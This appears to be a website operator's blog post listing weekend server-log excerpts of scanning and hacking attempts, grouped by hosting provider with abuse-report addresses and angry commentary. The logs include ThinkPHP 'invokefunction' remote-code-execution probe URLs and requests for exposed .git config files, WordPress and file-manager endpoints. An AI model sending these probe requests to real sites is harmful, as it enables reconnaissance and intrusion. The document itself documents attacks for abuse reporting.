… and so on… and son on!!! – VERY UNSECURE PROVIDER!!!

AS51074 – GOSTARESH-E-ERTEBATAT-E MABNA COMPANY (Private Joint Stock) – NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
37.130.202.220 www.website*x.com – – [19/Oct/2025:11:21:54 +0200] „GET /wp-login.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko“

AS212660 – WHG Hosting Services Ltd – VERY IGNORANT AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
WE REPORT SINCE MONTHS AND THERE IS COMING NO ANSWER… NOTHING!
198.38.94.18 www.website*x.com – – [19/Oct/2025:15:45:39 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0“

ABUSE-MAIL NR. 17 – WEEKEND!

abuse@blixsolutions.no,abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de,abuse@gigacoms.ru

AS50304 – Blix Solutions AS – NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
193.138.7.166 www.website*x.com – – [18/Oct/2025:20:18:00 +0200] „GET /?s=../%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP/1.0“ 200 48375 „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.146.45 Safari/537.36“
193.138.7.166 www.website*x.com – – [18/Oct/2025:20:18:00 +0200] „GET /?s=../%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP/1.0“ 200 48363 „-“ „Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.3026.43 Safari/537.36“
193.138.7.166 www.website*x.com – – [18/Oct/2025:20:18:01 +0200] „GET /?s=../%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP/1.0“ 200 48380 „-“ „Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.1826.95 Safari/537.36“
193.138.7.166 www.website*x.com – – [18/Oct/2025:20:18:02 +0200] „GET /?s=../%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP/1.0“ 200 48368 „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.1443.15 Safari/537.36“
193.138.7.166 www.website*x.com – – [18/Oct/2025:20:18:03 +0200] „GET /?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP/1.0“ 200 48378 „-“ „Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.2397.71 Safari/537.36“
193.138.7.166 www.website*x.com – – [18/Oct/2025:20:18:03 +0200] „GET /?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP/1.0“ 200 48366 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.1860.7 Safari/537.36“
193.138.7.166 www.website*x.com – – [18/Oct/2025:20:18:04 +0200] „GET /?s=/index/%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP/1.0“ 200 48383 „-“ „Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.779.22 Safari/537.36“
193.138.7.166 www.website*x.com – – [18/Oct/2025:20:18:04 +0200] „GET /?s=/index/%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP/1.0“ 200 48372 „-“ „Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.2498.123 Safari/537.36“
193.138.7.166 www.website*x.com – – [18/Oct/2025:20:18:05 +0200] „GET /?s=/Home/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP/1.0“ 200 48383 „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.1064.66 Safari/537.36“
193.138.7.166 www.website*x.com – – [18/Oct/2025:20:18:06 +0200] „GET /?s=/Home/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP/1.0“ 200 48372 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.552.102 Safari/537.36“
… and so on…. and son on!!!

AS51167 – Contabo GmbH – VERY IGNORANT AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
PENETRANT REFERRER-SPAM TO THIS DUBIOUS WEBSITE binance.com!!!
217.76.58.3 website*x.com – – [19/Oct/2025:05:51:33 +0200] „GET /wp-admin/css/ HTTP/1.0“ 403 – „binance.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“

AS51341 – Gigakom Sistems OOO – VERY UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
RUSSIA IS COMPLETE VERY UNWANTED AND COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
91.236.142.157 website*x.com – – [19/Oct/2025:06:00:55 +0200] „GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.92 Safari/537.36“

ABUSE-MAIL NR. 18 – WEEKEND!

abuse@datacamp.co.uk,abuse@invitesys.ro,dmzhostabuse@gmail.com,abuse@ovh.net,abuse@rt.ru

AS212238 – Datacamp Limited – INVITE Systems – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ONLY 1 AUTOMATIC ANSWER, NO MORE INFO! NEEDS UP TO 48 HOURS TO STOP THIS HACKER-IDIOTS! THIS IS A NOGO!!!
84.239.45.142 website*x.com – – [19/Oct/2025:07:36:14 +0200] „GET /wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
84.239.45.142 website*x.com – – [19/Oct/2025:07:36:16 +0200] „GET /xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
84.239.45.142 website*x.com – – [19/Oct/2025:07:36:17 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
84.239.45.142 website*x.com – – [19/Oct/2025:07:36:19 +0200] „GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
84.239.45.142 website*x.com – – [19/Oct/2025:07:36:21 +0200] „GET /web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
84.239.45.142 website*x.com – – [19/Oct/2025:07:36:22 +0200] „GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
84.239.45.142 website*x.com – – [19/Oct/2025:07:36:23 +0200] „GET /website/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
84.239.45.142 website*x.com – – [19/Oct/2025:07:36:27 +0200] „GET /wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
84.239.45.142 website*x.com – – [19/Oct/2025:07:36:28 +0200] „GET /news/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
84.239.45.142 website*x.com – – [19/Oct/2025:07:36:30 +0200] „GET /2018/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
84.239.45.142 website*x.com – – [19/Oct/2025:07:36:31 +0200] „GET /2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
84.239.45.142 website*x.com – – [19/Oct/2025:07:36:33 +0200] „GET /shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
84.239.45.142 website*x.com – – [19/Oct/2025:07:36:34 +0200] „GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
84.239.45.142 website*x.com – – [19/Oct/2025:07:36:35 +0200] „GET /test/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
84.239.45.142 website*x.com – – [19/Oct/2025:07:36:37 +0200] „GET /media/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
84.239.45.142 website*x.com – – [19/Oct/2025:07:36:38 +0200] „GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
84.239.45.142 website*x.com – – [19/Oct/2025:07:36:39 +0200] „GET /site/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
84.239.45.142 website*x.com – – [19/Oct/2025:07:36:40 +0200] „GET /cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
84.239.45.142 website*x.com – – [19/Oct/2025:07:36:42 +0200] „GET /sito/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“

AS48090 – TECHOFF SRV LIMITED – VERY IGNORANT AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
dmzhostabuse@gmail.com = NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
195.178.110.157 website*x.com – – [19/Oct/2025:08:45:04 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15“

AS16276 – OVH SAS – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ONLY ! AUTOMATIC ANSWER, NO MORE INFO! – ABUSE PER EMAIL IS STANDARD!
51.195.115.6 website*x.com – – [19/Oct/2025:14:03:26 +0200] „GET /blog-verify HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
51.195.115.6 website*x.com – – [19/Oct/2025:14:03:57 +0200] „GET /?check_plugin HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“

AS15468 – PJSC Rostelecom – VERY UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NEXT ONE AT WEEKEND!!!
RUSSIA IS COMPLETE VERY UNWANTED AND COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
109.225.42.122 website*x.com – – [19/Oct/2025:15:37:26 +0200] „GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36“

ABUSE-MAIL NR. 19 – WEEKEND!

abuse@datacamp.co.uk,igor@kinnet.ru,dmzhostabuse@gmail.com,noc@arriva.net.ru

AS212238 – Datacamp Limited – VERY UNSECURE! – DAILY HACKER-IDIOTS! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NEXT ONE AT WEEKEND!
ONLY 1 AUTOMATIC ANSWER! – STOP THIS NOW AND NOT IN LATEST 48 HOURS!!!
149.88.106.161 website*x.com – – [19/Oct/2025:15:12:52 +0200] „GET /wp-includes/customize/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
149.88.106.161 website*x.com – – [19/Oct/2025:15:12:52 +0200] „GET /wp-includes/blocks/shortcode/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0“
149.88.106.161 website*x.com – – [19/Oct/2025:15:12:52 +0200] „GET /wp-includes/js/crop/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36“
149.88.106.161 website*x.com – – [19/Oct/2025:15:12:52 +0200] „GET /wp-content/languages/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36“
149.88.106.161 website*x.com – – [19/Oct/2025:15:12:52 +0200] „GET /wp-includes/css/dist/list-reusable-blocks/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0“
149.88.106.161 website*x.com – – [19/Oct/2025:15:12:53 +0200] „GET /wp-includes/Requests/src/Auth/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36“
149.88.106.161 website*x.com – – [19/Oct/2025:15:12:53 +0200] „GET /wp-admin/css/colors/midnight/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
149.88.106.161 website*x.com – – [19/Oct/2025:15:12:53 +0200] „GET /wp-admin/js/widgets/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
149.88.106.161 website*x.com – – [19/Oct/2025:15:12:54 +0200] „GET /wp-includes/blocks/site-logo/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36“
149.88.106.161 website*x.com – – [19/Oct/2025:15:12:54 +0200] „GET /wp-includes/Requests/Proxy/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0“
149.88.106.161 website*x.com – – [19/Oct/2025:15:12:54 +0200] „GET /wp-includes/Text/Diff/Engine/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
… and so on… and so on!!!

AS51525 – Informacionnuye technologiyi Ltd – VERY UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
RUSSIA IS COMPLETE VERY UNWANTED AND COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
91.196.84.25 website*x.com – – [19/Oct/2025:16:42:46 +0200] „GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko)“

AS48090 – TECHOFF SRV LIMITED – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
dmzhostabuse@gmail.com = NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
195.178.110.157 website*x.com – – [19/Oct/2025:20:31:38 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3“

AS196739 – Success Ltd – VERY UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
RUSSIA IS COMPLETE VERY UNWANTED AND COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
176.125.145.158 website*x.com – – [19/Oct/2025:22:11:12 +0200] „GET /tinyfilemanager.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0“
176.125.145.158 website*x.com – – [19/Oct/2025:22:11:12 +0200] „GET /tinyfilemanager/tinyfilemanager.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0“

Das war es erst mal, wir posten ja nicht alles, weitere Abuse-Mails gingen zusätzlich noch heute morgen raus!

DIE PROTOKOLL-AUSZÜGE – ABUSE-MELDUNGEN vom WOCHENENDE AB 11. OKTOBER 25!

Wie immer auch dieses Wochenende mal wieder unzählige dumme Hacking-Versuche, beginnend ab dem Freitaf-Nachmittag, 03. Oktober 25.

Hier ein paar Auszüge dazu, die Abuse-Mails MIT ENTSPRECHENDER BEMERKUNG an die MIT VERANTWORTLICHEN PROVIDER gingen heute am Montag-Vormittag and die mit verantwortlichen Provider raus:

ABUSE-MAIL NR. 1 – WEEKEND!

abuse@datacamp.co.uk,abuse@h2.nexus,abuse@cheapy.host

AS215730 – H2NEXUS LTD – VERY UNWANTED AND IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
2a0b:4143:0:13b::2 website.*.com – – [11/Oct/2025:02:39:28 +0200] „GET /manage/.git/info/exclude HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
2a0b:4143:0:13b::2 website.*.com – – [11/Oct/2025:02:39:32 +0200] „GET /crm/.git/info/exclude HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
2a0b:4143:0:13b::2 website.*.com – – [11/Oct/2025:02:39:34 +0200] „GET /api/.git/info/exclude HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
2a0b:4143:0:13b::2 website.*.com – – [11/Oct/2025:02:39:35 +0200] „GET /config/.git/info/exclude HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
2a0b:4143:0:13b::2 website.*.com – – [11/Oct/2025:02:39:37 +0200] „GET /backend/.git/info/exclude HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
2a0b:4143:0:13b::2 website.*.com – – [11/Oct/2025:02:39:39 +0200] „GET /backup/.git/info/exclude HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
2a0b:4143:0:13b::2 website.*.com – – [11/Oct/2025:02:39:41 +0200] „GET /development/.git/info/exclude HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
2a0b:4143:0:13b::2 website.*.com – – [11/Oct/2025:02:39:42 +0200] „GET /uploads/.git/info/exclude HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
2a0b:4143:0:13b::2 website.*.com – – [11/Oct/2025:02:39:44 +0200] „GET /db/.git/info/exclude HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
2a0b:4143:0:13b::2 website.*.com – – [11/Oct/2025:02:39:45 +0200] „GET /secrets/.git/info/exclude HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
2a0b:4143:0:13b::2 website.*.com – – [11/Oct/2025:02:39:47 +0200] „GET /remote/.git/info/exclude HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
2a0b:4143:0:13b::2 website.*.com – – [11/Oct/2025:02:39:49 +0200] „GET /secure/.git/info/exclude HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
2a0b:4143:0:13b::2 website.*.com – – [11/Oct/2025:02:39:54 +0200] „GET /dashboard/.git/info/exclude HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

AS401120 – cheapy.host LLC – VERY UNWANTED AND IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
HERE WITH 2 IP´S!!!
WE REPORT THIS SINCE MONTHS! THIS PROVIDER DOES NOTHING!!!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
196.251.85.75 website.*.com – – [11/Oct/2025:03:19:16 +0200] „GET /xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
196.251.85.75 website.*.com – – [11/Oct/2025:03:19:16 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
196.251.85.75 website.*.com – – [11/Oct/2025:03:19:16 +0200] „GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
196.251.85.75 website.*.com – – [11/Oct/2025:03:19:17 +0200] „GET /web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
196.251.85.75 website.*.com – – [11/Oct/2025:03:19:17 +0200] „GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
196.251.85.75 website.*.com – – [11/Oct/2025:03:19:17 +0200] „GET /website/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
196.251.85.75 website.*.com – – [11/Oct/2025:03:19:18 +0200] „GET /wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
196.251.85.75 website.*.com – – [11/Oct/2025:03:19:18 +0200] „GET /news/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
196.251.85.75 website.*.com – – [11/Oct/2025:03:19:18 +0200] „GET /2018/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
196.251.85.75 website.*.com – – [11/Oct/2025:03:19:19 +0200] „GET /2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
196.251.85.75 website.*.com – – [11/Oct/2025:03:19:19 +0200] „GET /shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
